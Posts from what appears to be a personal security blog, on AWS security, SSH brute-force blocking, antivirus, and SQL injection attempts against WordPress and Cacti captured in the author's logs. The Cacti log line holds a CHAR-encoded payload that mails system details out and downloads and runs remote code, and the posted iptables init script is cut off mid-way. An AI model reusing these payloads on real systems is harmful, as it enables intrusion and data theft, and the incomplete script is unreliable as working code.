Amazon just posted a security whitepaper which describes the security measures they have in place to protect their customers. It's a short read (9 pages) and I strongly recommend it if you are using EC2, S3 or SimpleDB for anything. They explain their security measures and make recommendations for further protection their customers can put in place to protect their data.

One major concern I had was addressed by the whitepaper, "The AWS proprietary disk virtualization layer automatically wipes every block of storage used by the customer, and guarantees that one customer’s data is never exposed to another." I was always curious about those disk devices on EC2 and what data might be lingering on them but never had the time to investigate.

Here's an interesting snippet regarding their physical security:
"Amazon has many years of experience in designing, constructing, and operating largescale data centers. This experience has been applied to the AWS platform and infrastructure. AWS data centers are housed in nondescript facilities, and critical facilities have extensive setback and military grade perimeter control berms as well as other natural boundary protection. Physical access is strictly controlled both at the perimeter and at building ingress points by professional security staff utilizing video surveillance, state of the art intrusion detection systems, and other electronic means. Authorized staff must pass two-factor authentication no fewer than three times to access data center floors. All visitors and contractors are required to present identification and are signed in and continually escorted by authorized staff."

Come on guys, get it right... I'm getting sick of this.

I was just going through all of my items in google reader (which includes linuxsecurity.com) and it looks like someone has managed to hack some spam into their newsfeed. I find it mildly entertaining that a site so focused on security is being used by spammers.
Let me clarify that this abuse is most likely due to a bug in the software they're using to run on their site and not Linux.
Since they'll probably clean it all up, I grabbed a quick screenshot to show you what I saw:

For those of you that run AVG Free (free for personal use) there is a major update available. For those of you that don't run any antivirus software on your computer - SHAME ON YOU!
This new version includes anti-spyware, so if you have AVG's anti-spyware (Ewido) installed, you'll have to uninstall it first (go to Control Panel, then Add/Remove Programs.)
Here are a few bonuses of AVG Anti-Virus Free Edition:

• available free of charge to home users for the life of the product
• virus database updates are available for the lifetime of the product
• doesn't slow your system down (like other anti-virus systems I've seen)
• integrated spyware protection
• LinkScanner feature that gives users safety rankings for their Google, Yahoo, and MSN searches.

So, go and download it!
The install only takes a few minutes so don't put it off, do it now!

This is kinda old news, but interesting anyway. According to this story, "A federal judge in Vermont has ruled that prosecutors can't force a criminal defendant accused of having illegal images on his hard drive to divulge his PGP (Pretty Good Privacy) passphrase."

For those of you that don't remember, this part of the 5th amendment says, "No person...shall be compelled in any criminal case to be a witness against himself..."

I guess I can change my encryption passphrase to something other than "I don't know." now.

Here I am, peacefully working at my computer when I'm interrupted by a text message on my phone:

** PROBLEM alert - someserver.somewhere.com/SSH is CRITICAL **

That's not a good thing. Hoping it's a false alert, I try to ssh in. No luck. I try again. Still no luck. And a third time, Yes! I'm in. Let the troubleshooting begin.

I check to see what processes are running and sure enough, I find a culprit. There are a ton of sshd processes going. I take a look at auth.log and it's full of "Failed password for root from 218.145.160.100 port 55739 ssh2" messages (about 9,000 of them.) Here's what's going on: someone is trying to login to the server most likely by trying a bunch of passwords in a brute force attack. A brute force attack consists of trying every possible password until you find the right one. The attack doesn't really concern me since I don't allow password logins on most of the servers I manage. The excessive login attempts are a little annoying.

One command later and all traffic from that IP address drops into oblivion.

iptables -A INPUT -s 218.145.160.100 -j DROP

With that band-aid applied, it's time to get something better in place for the long term. A while back there was some discussion about preventing or slowing down such attacks on the SLLUG email list and some people posted scripts they use to deal with it. Here is my current version of one of those scripts:

#!/bin/bash
case "$1" in
start)
# Put IP addresses for allowed hosts into this, separated by spaces.
SSH_ALLOWED="123.45.67.89 98.76.54.32"

*)
echo "Usage: $0 {start|stop}" >&2
exit 1
;;
esac

This is an init script, so I put it in my /etc/init.d directory and set it up to run when the server boots up. What it does is only allows 5 SSH connection attempts per minute based on the source's IP address. From there, it blocks and logs any connection attempts. Two words of warning when working with IP tables; be careful. It's very easy to block yourself from accessing your own server. I've done this more times than I care to mention and had to take a drive to the datacenter or call their helpdesk to make things available again.

I have comment moderation turned on for most of the blog sites I manage. As a result, if someone new comes in and posts a comment, I get a nice email letting me know that I need to approve it. Yesterday, I got one that said this:

Author : Bill366758271','258878095billy@msn.com','','171.85.174.159','2008-03-11 22:28:47','2008-03-11 22:28:47','','0','lynx','comment','0','0'),('0', '', '', '', '', '2008-03-12 22:28:47', '2008-03-12 22:28:47', '', 'spam', '', 'comment', '0','0' ) /* (IP: 124.217.231.53 , 124.217.231.53)
E-mail :
URL : http://None
Whois : http://ws.arin.net/cgi-bin/whois.pl?queryinput=124.217.231.53
Comment:
None...

It looks like they were trying to bypass the comment approval process with an SQL injection attack. I'm not sure which versions of Wordpress are vulnerable, but I'm sure there are some older ones that are.

I was going through some apache access logs this morning and came across an attempted SQL injection attack. I don't have Cacti on my server, so I wasn't affected by the attempt. Here's the request:

24.147.54.90 - - [04/Feb/2008:23:25:30 -0700] "GET /cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,
CHAR(112,114,111,99),null,1,300,0,CHAR(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,
103,114,101,112,32,105,110,101,116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,
97,32,62,62,32,47,116,109,112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,
111,117,116,59,32,99,97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,54,54,
46,49,56,48,46,49,55,50,46,51,56,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,
111,111,46,99,111,109,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,32,45,79,32,47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,
47,116,109,112,47,116,59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,
111,47,116,46,112,108,32,45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,
47,116,46,112,108,32,62,32,46,47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null/**/FROM
/**/host/*+11111 HTTP/1.0" 200 642 "-" "-"

It looks like someone out there has an automated bot going around attempting this injection attack everywhere.

Starting Feb. 12, Microsoft will auto-update your browser to Internet Explorer 7 (unless you've upgraded already.)

It will be interesting to see how this affects the browser percentages online.  Currently the ratio of IE7 to IE6 users that visit this blog is almost 2:1.

(By the way, over half of the visitors to this site are running Firefox!)

Be aware that if you use Logitech or Microsoft wireless keyboards that rely on 27 MHz technology (non-bluetooth) you may be open to someone listening in on every keystroke you make.
This is due to weak encryption. I have a hard time understanding why people think they can get away with shoddy security implementations.
This article and white paper give you more geek-speak about the underlying details. They specifically mention the Microsoft Wireless Optical Desktop 1000 and 2000 keyboards as being cracked.

News story
whitepaper - "We know what you typed last summer"